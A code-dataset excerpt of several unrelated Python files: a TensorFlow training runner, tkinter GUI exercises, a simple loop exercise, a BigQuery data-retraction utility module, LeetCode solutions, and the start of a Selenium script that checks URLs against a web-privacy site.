tensors, feed_dict=feed_dict)\n\n self.train_summary_writer.add_summary(training_summary, i)\n\n print(\"Training at the end of iteration %i (epoch %i):\\tAccuracy:\\t%f\\tStreaming Accu:\\t%f\\tloss:\\t%f\" % (\n i, epoch, training_accuracy, train_streaming_accuracy, train_loss))\n self.train_summary_writer.flush()\n\n if label_batch is not None:\n return train_streaming_accuracy, train_auc[0]\n else:\n return train_streaming_accuracy, 0\n\n def load_checkpoint(self, path):\n self.saver = tf.train.import_meta_graph('%s.meta' % path)\n self.saver.restore(self.session, path)\n print(\"Checkpoint loaded from %s\" % path)\n\n def validate_once(self, i, input_batch, label_batch, reg_label_batch):\n feed_dict = {self.network.keep_prob: 1,\n self.network.is_training: False,\n self.network.input_features_placeholder: input_batch}\n\n if label_batch is not None:\n feed_dict.update({self.network.input_label_placeholder: label_batch})\n\n if reg_label_batch is not None:\n feed_dict.update({self.network.reg_input_placeholder: reg_label_batch})\n\n validation_summary, validation_accuracy, validation_streaming_accuracy, validation_loss = self.session.run(\n [self.valid_summaries_merged, self.valid_accuracy, self.valid_str_accu, self.valid_loss],\n feed_dict=feed_dict)\n\n val_auc = -1\n if label_batch is not None:\n val_auc = self.session.run([self.valid_auc], feed_dict=feed_dict)\n val_auc = val_auc[0][1]\n\n self.valid_summary_writer.add_summary(validation_summary, i)\n\n print(\"\\n\\n\" + \"*\" * 80)\n print(\"Validation after iteration %i:\\tAccuracy:\\t%f\\tStreaming Accu:\\t%f\\tloss:\\t%f\\tAUC:\\t%f\" % (\n i, validation_accuracy, validation_streaming_accuracy, validation_loss, val_auc))\n print(\"*\" * 80 + \"\\n\\n\")\n self.valid_summary_writer.flush()\n return val_auc, validation_loss\n\n def test_once(self, input_batch, label_batch, reg_label_batch):\n\n feed_dict = {self.network.keep_prob: 1,\n self.network.is_training: False,\n self.network.input_features_placeholder: input_batch}\n\n if label_batch is not None:\n feed_dict.update({self.network.input_label_placeholder: label_batch})\n\n if reg_label_batch is not None:\n feed_dict.update({self.network.reg_input_placeholder: reg_label_batch})\n\n test_summary, test_loss, test_predictions, test_accuracy = self.session.run(\n [self.test_summaries_merged, self.test_loss, self.test_predictions, self.test_accuracy],\n feed_dict=feed_dict)\n\n self.test_summary_writer.add_summary(test_summary, 1)\n\n print(\"\\n\\n\" + \"*\" * 80)\n print(\"Test accuracy at the end:\\t%f\\tloss:\\t%f\" % (\n test_accuracy, test_loss))\n print(\"*\" * 80 + \"\\n\\n\")\n self.test_summary_writer.flush()\n\n np.savetxt(self.test_pred_path, test_predictions, '%.7f')\n print(\"Test predictions/scores saved in %s \" % self.test_pred_path)\n\n def start_tensorboard(self):\n log_dir_abs_path = os.path.abspath(self.log_folder)\n print(\"tensorboard --logdir=%s\\n\" % (log_dir_abs_path))\n # Popen([\"tensorboard\", \"--logdir=%s\" %(log_dir_abs_path)])\n # print(\"\\n\")\n\n utils.background_process([\"tensorboard\", \"--logdir=%s\" % (log_dir_abs_path)])\n\n def split_to_batches(self, input, batch_size):\n np.random.shuffle(input)\n\n length = input.shape[0]\n remainder = length % batch_size\n number_of_batches = length // batch_size\n batches = []\n if number_of_batches != 0:\n batches = np.array_split(input[:length - remainder], number_of_batches)\n if remainder != 0:\n batches += [input[-remainder:]]\n return batches\n\n def create_stratifier(self, input, batch_size):\n label_batch = None\n\n if self.network.ground_truth_slicer:\n label_batch = input[:, self.network.ground_truth_slicer]\n\n return StratifiedShuffle(input, label_batch, batch_size)\n\n def split_to_batches_stratified(self, input, stratifier):\n for batch_idx in stratifier.split():\n yield input[batch_idx]\n\n def save_model(self, iteration):\n\n experiment_ID = \"L%s_H%s_L1%s_L2%s2_B%s_LR%s\" % (\n self.network.num_layers, self.network.num_hidden_units, self.network.l1_reg, self.network.l2_reg,\n self.batch_size, self.network.learning_rate) # empty means auto name\n path = \"%s/%s_train\" % (self.checkpoint_path, experiment_ID)\n self.saver.save(self.session, path, iteration)\n\n def run_training_dataframe(self, train_df, validate_df):\n\n self.newest_checkpoint_path = \"\"\n self.last_train_iteration = 0\n\n print(\"\\n\")\n val_acc = []\n avg_validation_acc = []\n val_loss = []\n avg_validation_loss = []\n v_count = 0\n # validation_window = params['validation_window']\n\n train_values = train_df.values\n train_stream_acc = 0\n\n label_batch = None\n reg_label_batch = None\n\n stratifier = self.create_stratifier(train_values, self.batch_size)\n\n j = 1\n for i in range(1, self.num_epochs + 1):\n train_auc_vector = []\n\n if hasattr(self.network, 'stratified') and self.network.stratified:\n batches = self.split_to_batches_stratified(train_values, stratifier)\n else:\n batches = self.split_to_batches(train_values, self.batch_size)\n\n for batch in batches:\n train_stream_acc, train_auc = self.apply_batch(batch, i, j)\n train_auc_vector.append(train_auc)\n j += 1\n\n train_auc = np.mean(train_auc_vector)\n\n if i % self.checkpoint_every == 0:\n self.save_model(i)\n\n if i % self.validation_interval == 0:\n\n input_batch = validate_df.iloc[:, self.network.input_features_slicer]\n\n if self.network.ground_truth_slicer:\n label_batch = validate_df.iloc[:, self.network.ground_truth_slicer]\n\n if self.network.reg_ground_truth_slicer:\n reg_label_batch = validate_df.iloc[:, self.network.reg_ground_truth_slicer]\n\n accuracy, loss = self.validate_once(i, input_batch, label_batch, reg_label_batch)\n val_acc.append(accuracy)\n val_loss.append(loss)\n v_count += 1\n if v_count > self.validation_window:\n Validation_Acc = np.mean(val_acc[-self.validation_window:])\n avg_validation_acc.append(Validation_Acc)\n avg_validation_loss.append(np.mean(val_loss[-self.validation_window:]))\n else:\n Validation_Acc = np.mean(val_acc)\n avg_validation_acc.append(Validation_Acc)\n avg_validation_loss.append(np.mean(val_loss))\n\n if i > 0 and i % (self.validation_interval * self.val_check_after) == 0:\n older_half_loss_mean = np.mean(avg_validation_loss[:len(avg_validation_loss) // 2])\n newer_half_loss_mean = np.mean(avg_validation_loss[len(avg_validation_loss) // 2:])\n # if older_half_loss_mean < 0.95 * newer_half_loss_mean:\n if older_half_loss_mean < (newer_half_loss_mean + 1e-4):\n print(older_half_loss_mean)\n print(newer_half_loss_mean)\n print(j)\n print(\"_\" * 50)\n break\n else:\n avg_validation_acc = []\n avg_validation_loss = []\n\n # if j % self.val_check_after == 0:\n # if np.mean(avg_validation_acc[:len(avg_validation_acc) // 2]) < np.mean(avg_validation_acc[len(avg_validation_acc) // 2:]):\n # print(np.mean(avg_validation_acc[:len(avg_validation_acc) // 2]))\n # print(np.mean(avg_validation_acc[len(avg_validation_acc) // 2:]))\n # print(self.num_epochs)\n # print(\"_\"*50)\n # break\n # else:\n # avg_validation_acc = []\n return Validation_Acc, train_stream_acc, train_auc, loss\n\n def apply_batch(self, batch, i, j):\n\n input_batch = batch[:, self.network.input_features_slicer]\n label_batch = None\n reg_label_batch = None\n\n if self.network.ground_truth_slicer:\n label_batch = batch[:, self.network.ground_truth_slicer]\n\n if self.network.reg_ground_truth_slicer:\n reg_label_batch = batch[:, self.network.reg_ground_truth_slicer]\n\n train_streaming_accu, train_auc = self.train_once_dataframe(i, j, input_batch, label_batch, reg_label_batch)\n self.last_train_iteration = j\n return train_streaming_accu, train_auc\n\n def run_test(self, test_df):\n print(\"TESTING\")\n label_batch = None\n reg_label_batch = None\n\n input_batch = test_df.iloc[:, self.network.input_features_slicer]\n if self.network.ground_truth_slicer:\n label_batch = test_df.iloc[:, self.network.ground_truth_slicer]\n\n if self.network.reg_ground_truth_slicer:\n reg_label_batch = test_df.iloc[:, self.network.reg_ground_truth_slicer]\n\n self.test_once(input_batch, label_batch, reg_label_batch)\n","sub_path":"mlp/fcn_runner.py","file_name":"fcn_runner.py","file_ext":"py","file_size_in_byte":17925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"482949423","text":"import tkinter as tk\n\nclass AlertDialog:\n \n def __init__(self):\n self.invalidDiag = tk.Toplevel()\n invalidInput = tk.Label(master=self.invalidDiag,\n text='Error: Invalid Input').grid(row=1,column=1)\n closeButton = tk.Button(master=self.invalidDiag,\n text='Close',\n command=self.invalidDiag.destroy).grid(row=2,column=1)\n def start(self):\n #self.invalidDiag.grab_set() #takes control over the dialog (makes it active)\n self.invalidDiag.wait_window()\n\nclass QuitButtonDialog():\n def __init__(self):\n self.quitMaster = tk.Toplevel()\n dialog = tk.Label(master = self.quitMaster, text=\"Continue to quit the program?\").grid(row=1)\n \n\n\n def start(self):\n #self.invalidDiag.grab_set() #takes control over the dialog (makes it active)\n self.quitMaster.wait_window()\n\n \nclass TimeConverter:\n def __init__(self):\n self.mainWindow = tk.Tk()\n self.mainWindow.title(\"Seconds Converter\")\n self.results = tk.StringVar()\n self.inputSecs = tk.StringVar()\n secLabel = tk.Label(master=self.mainWindow,\n text=\"Seconds:\").grid(row=0,sticky=\"W\")\n resultLabel = tk.Label(master=self.mainWindow,\n text=\"Converted Time:\\n(H:M:S)\").grid(row=1,sticky=\"W\")\n calcResults = tk.Label(master=self.mainWindow,\n background='light gray',width=20,\n textvariable = self.results,\n anchor='w').grid(row=1, column=1)\n secEntry = tk.Entry(master=self.mainWindow,\n width=24,\n textvariable = self.inputSecs).grid(row=0, column=1)\n\n calcButton = tk.Button(master=self.mainWindow,\n text='Calculate',\n command=self.SecondsToHours).grid(row=2,\n column=0,sticky=\"w\")\n quitButton = tk.Button(master=self.mainWindow,\n text='Quit',\n command=self.showQuitDialog()).grid(row=2,column=1,sticky=\"E\")\n\n def invalidInputEntered(self):\n errorDiag = AlertDialog()\n errorDiag.start()\n\n def showQuitDialog(self):\n quitdialog = QuitButtonDialog()\n quitdialog.start()\n \n def startDisplay(self) -> None:\n self.mainWindow.mainloop()\n\n def SecondsToHours(self):\n try:\n inputseconds = int(self.inputSecs.get())\n seconds = int(inputseconds%60)\n minutes = int(((inputseconds - seconds)/60)%60)\n hours = int((((inputseconds - seconds)/60)- minutes)/60)\n tempResults = str(hours) + ':' + str(minutes) + ':' + str(seconds)\n self.results.set(tempResults)\n return \n \n except ValueError:\n end = self.invalidInputEntered()\n \nif __name__ == '__main__':\n TimeConverter().startDisplay()\n","sub_path":"lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"586877038","text":"x=0\na=int(input(\"Digite un numero\"))\nwhile a>0:\n x+=1\n print(x)\n if x%x==0 and x%1==0 and x%2!=0:\n print(\"SI es un numero primo\")\n else:\n print(\"NO\")\n if x==a:\n break","sub_path":"primosB.py","file_name":"primosB.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"109717283","text":"#!C:\\Python34\\python.exe\n#!/Python34/python\n#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\n\"\"\"\n Python GUI using grid method\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\"\"\"\n\nimport os\nimport time\nimport tkinter as tk # import module tkinter, reference it as tk\n\n##-----------------------------------------------------------------------------\nclass Application( tk.Frame ):\n def __init__(self, master=None):\n tk.Frame.__init__(self, master)\n self.grid()\n self.CreateWidgets()\n \n def CreateWidgets (self):\n # ----- Button -----\n #self.quitButton = tk.Button(self, text='Quit', command=self.quit)\n self.quitButton = tk.Button(self, text='Quit', command=self.destroy)\n self.quitButton.grid(row=0, column=0)\n \n # ----- Menubutton -----\n self.BtnMenu = tk.Menubutton(self, text='Menu Button', bg=\"gray\", relief='raised')\n self.BtnMenu.grid()\n \n # ----- OptionMenu -----\n optionList = ( 'train', 'plane', 'boat' )\n self.val = tk.StringVar()\n self.val.set( optionList[0] )\n self.opmu = tk.OptionMenu( self, self.val, *optionList )\n self.opmu.grid()\n\n from tkinter import ttk\n self.opmu2 = ttk.OptionMenu( self, self.val, *optionList )\n #self.opmu2.grid()\n \n\n##-----------------------------------------------------------------------------\n\"\"\"\ndef main():\n# This is the main function\n# range(start, stop[, step])\n for i in range(0, 1000, 20):\n print(\"Current Num : %d\" % i)\n time.sleep(1)\n\"\"\" \nif __name__ == \"__main__\":\n #main()\n #msg = main()\n #print(msg)\n #mainloop()\n\n app = Application()\n app.master.title('widget OptionMenu')\n app.mainloop()\n\n\n##-----------------------------------------------------------------------------\n\"\"\"\nResource:\n - http://www.tkdocs.com/tutorial/windows.html#dialogs\n\n\"\"\"\n\n##-----------------------------------------------------------------------------\n## tkinter Widgets:\n\"\"\"\n - Button\n - Canvas\n - Checkbutton\n - Entry\n - Frame\n - Label\n - LabelFrame\n - Listbox\n - Menubutton\n - Menu\n - Message\n - messagebox (v2.x -> tkMessageBox)\n - OptionMenu\n - PaneWindow\n - Radiobutton\n - Scale\n - Scrollbar\n - Spinbox\n - Text\n - Toplevel\n#------------------------------------------------------------------------------\n\"\"\"\n","sub_path":"tkinter/tkinter_grid/OptionMenu.py","file_name":"OptionMenu.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"251026426","text":"# Python imports\nimport os\nimport re\nimport argparse\nimport logging\n\n# Project imports\nimport common\nfrom utils import bq\nfrom constants.retraction import retract_utils as consts\nfrom constants.utils import bq as bq_consts\n\nLOGGER = logging.getLogger(__name__)\n\nUNIONED_REGEX = re.compile(r'unioned_ehr_?\\d{6}')\nCOMBINED_REGEX = re.compile(r'combined\\d{6}')\nDEID_REGEX = re.compile(r'.*deid.*')\nEHR_REGEX = re.compile(r'ehr_?\\d{6}')\nRELEASE_REGEX = re.compile(r'R\\d{4}Q\\dR\\d')\nRELEASE_TAG_REGEX = re.compile(r'\\d{4}[qQ]\\d[rR]\\d')\nSANDBOX_REGEX = re.compile(r'.*sandbox.*')\nSTAGING_REGEX = re.compile(r'.*staging.*')\nVOCABULARY_REGEX = re.compile(r'vocabulary.*')\nVALIDATION_REGEX = re.compile(r'validation.*')\n\n\ndef get_table_id(table):\n \"\"\"\n Returns id column of the cdm table\n\n :param table: cdm table name\n :return: id column name for the table\n \"\"\"\n return table + '_id'\n\n\ndef get_tables(table_df):\n \"\"\"\n returns all tables in dataset using information_schema.columns dataframe\n\n :param table_df: dataframe from information_schema.columns\n :return: list containing all tables in dataset\n \"\"\"\n tables = table_df.get(bq_consts.TABLE_NAME).to_list()\n return tables\n\n\ndef get_pid_tables(table_df):\n \"\"\"\n returns tables containing person_id column in dataset using information_schema.columns dataframe\n\n :param table_df: dataframe from information_schema.columns\n :return: list containing tables with person_id in dataset\n \"\"\"\n tables_with_pid = table_df[table_df.get(bq_consts.COLUMN_NAME) ==\n consts.PERSON_ID].get(\n bq_consts.TABLE_NAME).to_list()\n return tables_with_pid\n\n\ndef get_mapping_type(tables):\n \"\"\"\n Returns whether mapping or ext tables exist within a dataset using list of tables as input\n\n :param tables: list of tables within the dataset\n :return: common.EXT or common.MAPPING\n \"\"\"\n mapping_tables = [\n table for table in tables if common.MAPPING_PREFIX in table\n ]\n ext_tables = [table for table in tables if common.EXT_SUFFIX in table]\n\n if len(mapping_tables) >= len(ext_tables):\n return common.MAPPING\n return common.EXT\n\n\ndef get_src_id(mapping_type):\n \"\"\"\n Returns source id column name for mapping or ext tables\n\n :param mapping_type: common.MAPPING or common.EXT\n :return: src_id or src_hpo_id\n \"\"\"\n src_id = 'src_id'\n if mapping_type == common.MAPPING:\n src_id = 'src_hpo_id'\n return src_id\n\n\ndef get_datasets_list(project_id, dataset_ids_list):\n \"\"\"\n Returns list of dataset_ids on which to perform retraction\n\n Returns list of rdr, ehr, unioned, combined and deid dataset_ids and excludes sandbox and staging datasets\n :param project_id: identifies the project containing datasets to retract from\n :param dataset_ids_list: string of datasets to retract from separated by a space. If set to 'all_datasets',\n retracts from all datasets. If set to 'none', skips retraction from BigQuery datasets\n :return: List of dataset_ids\n :raises: AttributeError if dataset_ids_str does not allow .split()\n \"\"\"\n client = bq.get_client(project_id)\n all_dataset_ids = [\n dataset.dataset_id for dataset in list(client.list_datasets(project_id))\n ]\n\n if not dataset_ids_list or dataset_ids_list == [consts.NONE]:\n dataset_ids = []\n LOGGER.info(\n \"No datasets specified. Defaulting to empty list. Expect bucket only retraction.\"\n )\n elif dataset_ids_list == [consts.ALL_DATASETS]:\n dataset_ids = all_dataset_ids\n LOGGER.info(\n f\"All datasets are specified. Setting dataset_ids to all datasets in project: {project_id}\"\n )\n else:\n # only consider datasets that exist in the project\n dataset_ids = [\n dataset_id for dataset_id in dataset_ids_list\n if dataset_id in all_dataset_ids\n ]\n LOGGER.info(\n f\"Datasets specified and existing in project {project_id}: {dataset_ids}\"\n )\n\n # consider datasets containing PPI/EHR data, excluding sandbox/staging datasets\n dataset_ids = [\n dataset_id for dataset_id in dataset_ids\n if get_dataset_type(dataset_id) != common.OTHER and\n not is_sandbox_dataset(dataset_id)\n ]\n\n LOGGER.info(f\"Found datasets to retract from: {', '.join(dataset_ids)}\")\n return dataset_ids\n\n\ndef is_deid_label_or_id(client, project_id, dataset_id):\n \"\"\"\n Validates if a dataset is labeled deid or contains deid in the dataset_id\n\n :param client: BigQuery client\n :param project_id: project containing the dataset\n :param dataset_id: dataset to identify\n :return: Boolean indicating if a dataset is a deid dataset\n \"\"\"\n label = _is_labeled_deid(client, project_id, dataset_id)\n if label is None:\n return is_deid_dataset(dataset_id)\n return label\n\n\ndef _is_labeled_deid(client, project_id, dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a deid dataset using the label 'de_identified'\n\n :param client: BigQuery client object\n :param project_id: Identifies the project\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is labeled a deid dataset or None if unlabeled\n \"\"\"\n # when called by is_deid_label_or_id, return None so name can be checked.\n if not client:\n LOGGER.debug(\"Client not available. Labels can't be checked.\")\n return None\n\n dataset = client.get_dataset(f'{project_id}.{dataset_id}')\n if dataset.labels and consts.DE_IDENTIFIED in dataset.labels:\n return dataset.labels[consts.DE_IDENTIFIED] == consts.TRUE\n return None\n\n\ndef is_deid_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a deid dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a deid dataset\n \"\"\"\n return bool(re.match(DEID_REGEX, dataset_id)) or bool(\n re.match(RELEASE_REGEX, dataset_id))\n\n\ndef is_combined_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a combined dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a combined dataset\n \"\"\"\n if is_deid_dataset(dataset_id):\n return False\n return bool(re.match(COMBINED_REGEX, dataset_id))\n\n\ndef is_unioned_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a unioned dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a unioned dataset\n \"\"\"\n return bool(re.match(UNIONED_REGEX, dataset_id))\n\n\ndef is_ehr_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is an ehr dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is an ehr dataset\n \"\"\"\n return bool(re.match(\n EHR_REGEX,\n dataset_id)) or dataset_id == os.environ.get('BIGQUERY_DATASET_ID')\n\n\ndef is_sandbox_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a sandbox dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a sandbox dataset\n \"\"\"\n return bool(re.match(SANDBOX_REGEX, dataset_id))\n\n\ndef is_staging_dataset(dataset_id):\n \"\"\"\n Returns boolean indicating if a dataset is a staging dataset using the dataset_id\n :param dataset_id: Identifies the dataset\n :return: Boolean indicating if the dataset is a staging dataset\n \"\"\"\n return bool(re.match(STAGING_REGEX, dataset_id))\n\n\ndef get_dataset_type(dataset_id):\n if common.COMBINED in dataset_id and common.DEID not in dataset_id:\n return common.COMBINED\n if common.UNIONED_EHR in dataset_id:\n return common.UNIONED_EHR\n if common.RDR in dataset_id:\n return common.RDR\n if common.EHR in dataset_id and common.UNIONED_EHR not in dataset_id:\n return common.EHR\n if common.DEID in dataset_id or is_deid_dataset(dataset_id):\n return common.DEID\n return common.OTHER\n\n\ndef get_pid_list_to_sql_expr(pid_source):\n \"\"\"\n Converts list of ints into BQ compatible string of the form '(int_1, int_2, ...)'\n\n :param pid_source: list of pids to consider as ints\n :return: BQ compatible string of ints\n \"\"\"\n return str(tuple(pid_source))\n\n\ndef get_pid_table_to_sql_expr(pid_source, pid):\n \"\"\"\n Converts pid table string into BQ statement selecting pids from input table\n\n :param pid: person_id or research_id\n :param pid_source: string of the form 'project.dataset.table' where table contains pids to consider\n :return: BQ statement selecting pids\n \"\"\"\n return consts.PID_QUERY.format(pid=pid, pid_source=pid_source)\n\n\ndef get_mapping_tables(mapping_type, tables):\n \"\"\"\n returns mapping tables in dataset using mapping type and list of tables in the dataset\n\n :param mapping_type: common.EXT or common.MAPPING\n :param tables: list of tables in dataset\n :return: list of mapping tables (or ext tables)\n \"\"\"\n if mapping_type == common.MAPPING:\n mapping_tables = [\n table for table in tables if common.MAPPING_PREFIX in table\n ]\n return mapping_tables\n mapping_tables = [table for table in tables if common.EXT_SUFFIX in table]\n return mapping_tables\n\n\ndef get_cdm_table(mapping_ext_table):\n if common.MAPPING_PREFIX in mapping_ext_table:\n return mapping_ext_table.replace(common.MAPPING_PREFIX, '')\n return mapping_ext_table.replace(common.EXT_SUFFIX, '')\n\n\ndef get_cdm_and_mapping_tables(mapping_tables, tables_with_pid):\n \"\"\"\n Returns dict containing cdm tables and corresponding mapping tables as key value pairs\n\n :param mapping_tables: list of mapping tables in dataset\n :param tables_with_pid: list of tables containing person_id\n :return: dict containing cdm_table, mapping_table as key, value pairs\n \"\"\"\n # filters tables which do not exist, also ensures table is valid cdm_table\n cdm_and_mapping_tables = dict((get_cdm_table(table), table)\n for table in mapping_tables\n if get_cdm_table(table) in tables_with_pid)\n return cdm_and_mapping_tables\n\n\ndef get_pid_sql_expr(pid_source, pid=consts.PERSON_ID):\n \"\"\"\n Converts a list of integer pids into a bq-compatible sql expression containing the pids as values\n or a string of the form 'project.dataset.table' into a SELECT query that selects pids from the table\n\n :param pid_source: can be a list of pids or string of the form 'project.dataset.table', where table contains pids\n :param pid: person_id or research_id, required for table sql expr, 'person_id' by default\n :return: bq-compatible string expression of pids or SELECT query that selects pids from table\n :raises ValueError if pid_source type is incorrect or pid_table string is not specified correctly\n \"\"\"\n if type(pid_source) == list:\n return get_pid_list_to_sql_expr(pid_source)\n if type(pid_source) == str and pid_source.count('.') == 2:\n return get_pid_table_to_sql_expr(pid_source, pid)\n raise ValueError(\n 'Please specify pid_table parameters as \"project.dataset.table\"')\n\n\ndef get_dataset_ids_to_target(project_id, dataset_ids=None):\n \"\"\"\n Return dataset_ids that are found in the project based on BQ metadata\n\n :param project_id: Identifies the project to target\n :param dataset_ids: list identifying datasets or None for all datasets\n :return: List of dataset_ids in the project to target\n \"\"\"\n client = bq.get_client(project_id)\n all_datasets = list(client.list_datasets(project_id))\n all_dataset_ids = [dataset.dataset_id for dataset in all_datasets]\n result_dataset_ids = []\n if dataset_ids is None:\n result_dataset_ids = all_dataset_ids\n else:\n for dataset_id in dataset_ids:\n if dataset_id not in all_dataset_ids:\n LOGGER.info(\n f\"Dataset {dataset_id} not found in project {project_id}, skipping\"\n )\n else:\n result_dataset_ids.append(dataset_id)\n return result_dataset_ids\n\n\ndef check_dataset_ids_for_sentinel(dataset_ids):\n \"\"\"\n Checks if sentinel value \"all_datasets\" is the only value in the list dataset_ids\n If so, returns None. If not, raises error if \"all_datasets\" is in the list of dataset_ids\n\n :param dataset_ids: list of dataset_ids\n :return: dataset_ids: list of dataset_ids\n :raises ValueError\n \"\"\"\n if len(dataset_ids) == 1 and dataset_ids[0] == consts.ALL_DATASETS:\n return None\n for dataset_id in dataset_ids:\n if dataset_id == consts.ALL_DATASETS:\n raise ValueError(\n \"Please enter 'all_datasets' to target all datasets \"\n \"or specific datasets without using 'all_datasets'\")\n return dataset_ids\n\n\ndef fetch_parser():\n parser = argparse.ArgumentParser(\n description='Estimates the prevalence of specified pids in the project',\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('-p',\n '--project_id',\n action='store',\n dest='project_id',\n help='Identifies the project to retract data from',\n required=True)\n parser.add_argument('-d',\n '--dataset_ids',\n action='store',\n nargs='+',\n dest='dataset_ids',\n help='Identifies datasets to target. Set to '\n '-d all_datasets to target all datasets in project '\n 'or specific datasets as -d dataset_1 dataset_2 etc.',\n required=True)\n parser.add_argument('-o',\n '--hpo_id',\n action='store',\n dest='hpo_id',\n help='Identifies the site submitting the person_ids, '\n 'can be \"none\" if not targeting ehr datasets',\n required=True)\n pid_source_group = parser.add_mutually_exclusive_group(required=True)\n\n pid_source_group.add_argument(\n '-l',\n '--pid_list',\n dest='pid_source',\n nargs='+',\n type=int,\n help='person/research ids to consider separated by spaces')\n pid_source_group.add_argument(\n '-t',\n '--pid_table',\n dest='pid_source',\n help='Specify table as \"project.dataset.table\"')\n return parser\n","sub_path":"data_steward/retraction/retract_utils.py","file_name":"retract_utils.py","file_ext":"py","file_size_in_byte":14774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"554777358","text":"# class Solution:\r\n# def buildArray(self, target: [int], n: int) :\r\n# stack=[]\r\n# lists=[_ for _ in range(1,n+1)]\r\n# res=[]\r\n# i=0\r\n# while stack!=target:\r\n# top=lists.pop(0)\r\n# stack.append(top)\r\n# res.append('push')\r\n# if stack[-1]==target[i]:\r\n# i+=1\r\n# else:\r\n# stack.pop()\r\n# res.append('pop')\r\n# return res\r\n#\r\n# a=Solution()\r\n# print(a.buildArray(target=[1,3],n=3))\r\n\r\n# class Solution:\r\n# def countTriplets(self, arr: [int]) -> int:\r\n# n=len(arr)\r\n# res=0\r\n# for i in range(n-1):\r\n# for j in range(i+1,n):\r\n# a=0 #0与任何数异或都为那个数本身\r\n# for i1 in range(i,j):\r\n# a=arr[i1]^a\r\n# b=0\r\n# for j1 in range(j,n):\r\n# b=arr[j1]^b\r\n# if b==a:\r\n# res+=1\r\n# return res\r\n#1443题\r\n#方法一:使用深度优先搜索\r\nimport collections\r\nclass Solution:\r\n def minTime(self, n: int, edges: [[int]], hasApple: [bool]) -> int:\r\n build_tree=collections.defaultdict(list) #构造的树\r\n for i,j in edges:\r\n build_tree[i].append(j)\r\n def dfs(root):\r\n ret=0\r\n if root in build_tree:\r\n for child in build_tree[root]:\r\n tmp=dfs(child) #每个子节点得到的距离\r\n if hasApple[child]==True or tmp!=0: #如果当前节点的子节点为苹果或者这个子节点的子节点是苹果,那么当前节点就要纳入计算\r\n ret+=2\r\n ret+=tmp\r\n return ret\r\n return dfs(0)\r\na=Solution()\r\nprint(a.minTime(n = 7, edges = [[0,1],[0,2],[1,4],[1,5],[2,3],[2,6]], hasApple = [False,False,True,False,True,True,False]))\r\n\r\n#方法二,将每一个从根节点到苹果节点的所有路径存入集合(集合有去重作用),最后返回2*所有路径长度\r\nclass Solution:\r\n def minTime(self, n: int, edges: [[int]], hasApple: [bool]) -> int:\r\n apple_tree={}\r\n for i in edges:\r\n apple_tree[i[1]]=i[0]\r\n res=set() #存储路径的集合\r\n for j in hasApple:\r\n if j:\r\n heads=j\r\n while heads!=0: #如果当前节点没有到达根节点\r\n res.add((apple_tree[heads],heads))\r\n return len(res)*2\r\n\r\n\r\n\r\n","sub_path":"周赛/188周赛.py","file_name":"188周赛.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184238490","text":"import os\nimport re\n\nimport resultFilename\nimport urlChecker\nimport verifFile\n\nimport selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nwebprivacycheckURL = \"https://webprivacycheck.plehn-media.de/en\"\n\nurlRegex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)\" \\\n r\"(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+\" \\\n r\"|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n\nurlDatabase = open(\"../export-ITM_URL_2013-10-14.csv\", \"r\", encoding=\"utf-8\").read()\npreviousUrl = []\n\noptions = Options()\noptions.add_argument(r\"user-data-dir=C:\\selenium\")\n\nverifFile.verif(\"../result/result.csv\",\n \"name;\"\n \"First-party cookies number; \"\n \"First-party cookies domains; \"\n \"Third-party cookies number; \"\n \"Third-party cookies domains; \"\n \"Third-party requests number; \"\n \"Third-party requests domains \\n\")\n\nverifFile.verif(\"../result/urlNotWorking.log\",\n \"Url with 404 or 403 error \\n\")\n\nverifFile.verif(\"../result/error.log\",\n \"url dont il y a eu un probleme avec l'analyse \\n\")\n\nbrowser = webdriver.Chrome(executable_path=r'../lib/chromedriver.exe', options=options, )\nbrowser.get(webprivacycheckURL)\nbrowser.implicitly_wait(5)\n\nfor field in urlDatabase.split('\\n'):\n for url in re.findall(urlRegex, field):\n currentURL = url[0]\n if currentURL not in previousUrl:\n if os.path.exists(f\"../result/{resultFilename.resultFileName(currentURL)}.csv\"):\n print(\"Aborted, report exist for : \" + currentURL)\n continue\n else:\n print(\"Work in progress : \" + currentURL)\n if not urlChecker.urlChecker(currentURL):\n with open(\"../result/urlNotWorking.log\", \"a\") as 